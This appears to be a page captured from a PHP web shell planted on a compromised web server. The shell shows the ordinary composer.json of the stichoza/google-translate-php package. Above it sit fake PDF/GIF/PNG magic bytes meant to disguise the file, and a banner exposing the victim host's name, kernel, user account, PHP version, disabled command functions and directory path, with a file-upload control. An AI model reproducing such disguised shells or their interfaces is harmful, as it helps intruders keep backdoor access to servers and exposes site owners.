%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/admin1/vendor/stichoza/google-translate-php/ |
Upload File : |
{
"name": "stichoza/google-translate-php",
"description": "Free Google Translate API PHP Package",
"keywords": ["google", "translate", "translator", "php", "translating"],
"license": "MIT",
"homepage": "https://github.com/Stichoza/google-translate-php",
"authors": [
{
"name": "Levan Velijanashvili",
"email": "me@stichoza.com"
}
],
"require": {
"php": "^7.1|^8",
"guzzlehttp/guzzle": "~6.0|~7.0",
"ext-json": "*",
"ext-mbstring": "*"
},
"require-dev": {
"phpunit/phpunit": "^7.0"
},
"autoload": {
"psr-4": {
"Stichoza\\GoogleTranslate\\": "src/"
}
},
"autoload-dev": {
"psr-4": {
"Stichoza\\GoogleTranslate\\Tests\\": "tests/"
}
}
}